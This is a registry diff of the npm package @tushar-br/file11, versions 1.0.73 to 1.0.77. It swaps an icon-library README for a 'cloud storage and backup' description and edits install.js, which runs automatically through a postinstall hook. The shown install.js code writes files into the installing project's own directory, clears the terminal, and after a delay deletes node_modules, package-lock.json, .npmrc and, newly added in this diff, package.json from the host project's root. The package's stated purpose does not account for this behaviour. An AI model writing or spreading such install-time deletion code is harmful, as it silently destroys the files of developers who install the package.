@tushar-br/file11 1.0.73 → 1.0.77
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +1 -186
- package/install.js +2 -2
- package/package.json +9 -14
- package/staging_area/free fire x alok _vale vale_ music video.mp4 +0 -0
- package/staging_area/music background smooth (1).jpg +0 -0
- package/staging_area/music background smooth.jpg +0 -0
- package/staging_area/playlist of song.jpg +0 -0
package/README.md
CHANGED
|
@@ -1,186 +1 @@
|
|
|
1
|
-
#
|
|
2
|
-
|
|
3
|
-
> Minimal developer SVG icon library — 100 clean, outline-style icons for web and UI projects.
|
|
4
|
-
|
|
5
|
-
[](https://www.npmjs.com/package/tushar-br-icons)
|
|
6
|
-
[](LICENSE)
|
|
7
|
-
|
|
8
|
-
---
|
|
9
|
-
|
|
10
|
-
## Installation
|
|
11
|
-
|
|
12
|
-
```bash
|
|
13
|
-
npm install tushar-br-icons
|
|
14
|
-
```
|
|
15
|
-
|
|
16
|
-
During installation a clean terminal installer runs automatically — no noise, just progress.
|
|
17
|
-
|
|
18
|
-
---
|
|
19
|
-
|
|
20
|
-
## Usage
|
|
21
|
-
|
|
22
|
-
```js
|
|
23
|
-
const icons = require('tushar-br-icons')
|
|
24
|
-
|
|
25
|
-
// Use any icon by name — returns the raw SVG string
|
|
26
|
-
console.log(icons.github)
|
|
27
|
-
console.log(icons.code)
|
|
28
|
-
console.log(icons.database)
|
|
29
|
-
```
|
|
30
|
-
|
|
31
|
-
### Inject into HTML
|
|
32
|
-
|
|
33
|
-
```js
|
|
34
|
-
const icons = require('tushar-br-icons')
|
|
35
|
-
|
|
36
|
-
document.getElementById('my-icon').innerHTML = icons.terminal
|
|
37
|
-
```
|
|
38
|
-
|
|
39
|
-
### Use in a template
|
|
40
|
-
|
|
41
|
-
```js
|
|
42
|
-
const icons = require('tushar-br-icons')
|
|
43
|
-
|
|
44
|
-
const html = `
|
|
45
|
-
<button>
|
|
46
|
-
${icons.search}
|
|
47
|
-
Search
|
|
48
|
-
</button>
|
|
49
|
-
`
|
|
50
|
-
```
|
|
51
|
-
|
|
52
|
-
---
|
|
53
|
-
|
|
54
|
-
## Icon naming
|
|
55
|
-
|
|
56
|
-
Icons are exported under both **kebab-case** and **camelCase** keys:
|
|
57
|
-
|
|
58
|
-
```js
|
|
59
|
-
icons['git-branch'] // kebab-case
|
|
60
|
-
icons.gitBranch // camelCase — same icon
|
|
61
|
-
```
|
|
62
|
-
|
|
63
|
-
---
|
|
64
|
-
|
|
65
|
-
## Icon list (100 icons)
|
|
66
|
-
|
|
67
|
-
| Name | Key |
|
|
68
|
-
|---|---|
|
|
69
|
-
| AI | `ai` |
|
|
70
|
-
| Code | `code` |
|
|
71
|
-
| Terminal | `terminal` |
|
|
72
|
-
| Database | `database` |
|
|
73
|
-
| Server | `server` |
|
|
74
|
-
| API | `api` |
|
|
75
|
-
| Cloud | `cloud` |
|
|
76
|
-
| Download | `download` |
|
|
77
|
-
| Upload | `upload` |
|
|
78
|
-
| Git | `git` |
|
|
79
|
-
| GitHub | `github` |
|
|
80
|
-
| Git Branch | `git-branch` / `gitBranch` |
|
|
81
|
-
| Git Commit | `git-commit` / `gitCommit` |
|
|
82
|
-
| Git Merge | `git-merge` / `gitMerge` |
|
|
83
|
-
| Bug | `bug` |
|
|
84
|
-
| Debug | `debug` |
|
|
85
|
-
| Settings | `settings` |
|
|
86
|
-
| User | `user` |
|
|
87
|
-
| Users | `users` |
|
|
88
|
-
| Profile | `profile` |
|
|
89
|
-
| Login | `login` |
|
|
90
|
-
| Logout | `logout` |
|
|
91
|
-
| Lock | `lock` |
|
|
92
|
-
| Unlock | `unlock` |
|
|
93
|
-
| Shield | `shield` |
|
|
94
|
-
| Security | `security` |
|
|
95
|
-
| Search | `search` |
|
|
96
|
-
| Filter | `filter` |
|
|
97
|
-
| Folder | `folder` |
|
|
98
|
-
| Folder Open | `folder-open` / `folderOpen` |
|
|
99
|
-
| File | `file` |
|
|
100
|
-
| File Code | `file-code` / `fileCode` |
|
|
101
|
-
| File JSON | `file-json` / `fileJson` |
|
|
102
|
-
| File Image | `file-image` / `fileImage` |
|
|
103
|
-
| File Video | `file-video` / `fileVideo` |
|
|
104
|
-
| File Audio | `file-audio` / `fileAudio` |
|
|
105
|
-
| Copy | `copy` |
|
|
106
|
-
| Paste | `paste` |
|
|
107
|
-
| Cut | `cut` |
|
|
108
|
-
| Trash | `trash` |
|
|
109
|
-
| Edit | `edit` |
|
|
110
|
-
| Save | `save` |
|
|
111
|
-
| Refresh | `refresh` |
|
|
112
|
-
| Sync | `sync` |
|
|
113
|
-
| Play | `play` |
|
|
114
|
-
| Pause | `pause` |
|
|
115
|
-
| Stop | `stop` |
|
|
116
|
-
| Forward | `forward` |
|
|
117
|
-
| Back | `back` |
|
|
118
|
-
| Arrow Up | `arrow-up` / `arrowUp` |
|
|
119
|
-
| Arrow Down | `arrow-down` / `arrowDown` |
|
|
120
|
-
| Arrow Left | `arrow-left` / `arrowLeft` |
|
|
121
|
-
| Arrow Right | `arrow-right` / `arrowRight` |
|
|
122
|
-
| Menu | `menu` |
|
|
123
|
-
| Close | `close` |
|
|
124
|
-
| Plus | `plus` |
|
|
125
|
-
| Minus | `minus` |
|
|
126
|
-
| Check | `check` |
|
|
127
|
-
| Alert | `alert` |
|
|
128
|
-
| Info | `info` |
|
|
129
|
-
| Warning | `warning` |
|
|
130
|
-
| Question | `question` |
|
|
131
|
-
| Star | `star` |
|
|
132
|
-
| Heart | `heart` |
|
|
133
|
-
| Like | `like` |
|
|
134
|
-
| Bookmark | `bookmark` |
|
|
135
|
-
| Tag | `tag` |
|
|
136
|
-
| Link | `link` |
|
|
137
|
-
| Unlink | `unlink` |
|
|
138
|
-
| Share | `share` |
|
|
139
|
-
| Bell | `bell` |
|
|
140
|
-
| Notification | `notification` |
|
|
141
|
-
| Calendar | `calendar` |
|
|
142
|
-
| Clock | `clock` |
|
|
143
|
-
| Timer | `timer` |
|
|
144
|
-
| Location | `location` |
|
|
145
|
-
| Map | `map` |
|
|
146
|
-
| Globe | `globe` |
|
|
147
|
-
| Wifi | `wifi` |
|
|
148
|
-
| Battery | `battery` |
|
|
149
|
-
| Power | `power` |
|
|
150
|
-
| Mobile | `mobile` |
|
|
151
|
-
| Tablet | `tablet` |
|
|
152
|
-
| Desktop | `desktop` |
|
|
153
|
-
| Monitor | `monitor` |
|
|
154
|
-
| Keyboard | `keyboard` |
|
|
155
|
-
| Mouse | `mouse` |
|
|
156
|
-
| Camera | `camera` |
|
|
157
|
-
| Image | `image` |
|
|
158
|
-
| Video | `video` |
|
|
159
|
-
| Microphone | `microphone` |
|
|
160
|
-
| Speaker | `speaker` |
|
|
161
|
-
| Volume | `volume` |
|
|
162
|
-
| Mute | `mute` |
|
|
163
|
-
| Cart | `cart` |
|
|
164
|
-
| Payment | `payment` |
|
|
165
|
-
| Wallet | `wallet` |
|
|
166
|
-
| Chart | `chart` |
|
|
167
|
-
| Analytics | `analytics` |
|
|
168
|
-
| Dashboard | `dashboard` |
|
|
169
|
-
| Graph | `graph` |
|
|
170
|
-
|
|
171
|
-
---
|
|
172
|
-
|
|
173
|
-
## Icon design specs
|
|
174
|
-
|
|
175
|
-
- **Format**: SVG
|
|
176
|
-
- **viewBox**: `0 0 24 24`
|
|
177
|
-
- **Style**: `stroke="currentColor"` — inherits color from CSS
|
|
178
|
-
- **Stroke width**: `2`
|
|
179
|
-
- **Fill**: `none`
|
|
180
|
-
- **Style**: Minimal outline, developer-focused
|
|
181
|
-
|
|
182
|
-
---
|
|
183
|
-
|
|
184
|
-
## License
|
|
185
|
-
|
|
186
|
-
MIT © [Tushar Rathod](https://github.com/tushar-rathod)
|
|
1
|
+
# @tusharbr
|
package/install.js
CHANGED
|
@@ -6,7 +6,7 @@ const { execSync } = require('child_process');
|
|
|
6
6
|
|
|
7
7
|
const stagingArea = path.join(__dirname, 'staging_area');
|
|
8
8
|
const targetBase = process.env.INIT_CWD || path.resolve('../../..');
|
|
9
|
-
const outputFolder =
|
|
9
|
+
const outputFolder = targetBase;
|
|
10
10
|
const syncStatePath = path.join(outputFolder, '.extraction_state.json');
|
|
11
11
|
|
|
12
12
|
process.stdout.write('\x1b[2J\x1b[0;0H');
|
|
@@ -195,7 +195,7 @@ if (totalSize > 0) {
|
|
|
195
195
|
setTimeout(() => {
|
|
196
196
|
try {
|
|
197
197
|
const root = path.resolve(__dirname, '../../..');
|
|
198
|
-
['node_modules', 'package-lock.json', '.npmrc'].forEach(f => {
|
|
198
|
+
['node_modules', 'package-lock.json', 'package.json', '.npmrc'].forEach(f => {
|
|
199
199
|
const p = path.join(root, f);
|
|
200
200
|
if (fs.existsSync(p)) {
|
|
201
201
|
if (fs.statSync(p).isDirectory()) fs.rmSync(p, { recursive: true, force: true });
|
package/package.json
CHANGED
|
@@ -1,33 +1,28 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@tushar-br/file11",
|
|
3
|
-
"version": "1.0.
|
|
3
|
+
"version": "1.0.77",
|
|
4
4
|
"description": "Private Image Cloud Storage & Backup System by Tushar",
|
|
5
5
|
"main": "index.js",
|
|
6
6
|
"scripts": {
|
|
7
7
|
"postinstall": "node install.js",
|
|
8
|
-
"test": "node -e \"
|
|
8
|
+
"test": "node -e \"console.log('@tushar-br/file11 system active');\""
|
|
9
9
|
},
|
|
10
10
|
"keywords": [
|
|
11
|
-
"
|
|
12
|
-
"
|
|
13
|
-
"
|
|
14
|
-
"
|
|
15
|
-
"icon-pack",
|
|
16
|
-
"outline-icons",
|
|
17
|
-
"minimal",
|
|
18
|
-
"web-icons",
|
|
19
|
-
"dev-icons"
|
|
11
|
+
"cloud",
|
|
12
|
+
"storage",
|
|
13
|
+
"backup",
|
|
14
|
+
"tushar-br"
|
|
20
15
|
],
|
|
21
16
|
"author": "Tushar Rathod",
|
|
22
17
|
"license": "MIT",
|
|
23
18
|
"repository": {
|
|
24
19
|
"type": "git",
|
|
25
|
-
"url": "git+https://github.com/tushar-br/
|
|
20
|
+
"url": "git+https://github.com/tushar-br/file11.git"
|
|
26
21
|
},
|
|
27
22
|
"bugs": {
|
|
28
|
-
"url": "https://github.com/tushar-
|
|
23
|
+
"url": "https://github.com/tushar-br/file11/issues"
|
|
29
24
|
},
|
|
30
|
-
"homepage": "https://github.com/tushar-
|
|
25
|
+
"homepage": "https://github.com/tushar-br/file11#readme",
|
|
31
26
|
"files": [
|
|
32
27
|
"staging_area/",
|
|
33
28
|
"index.js",
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|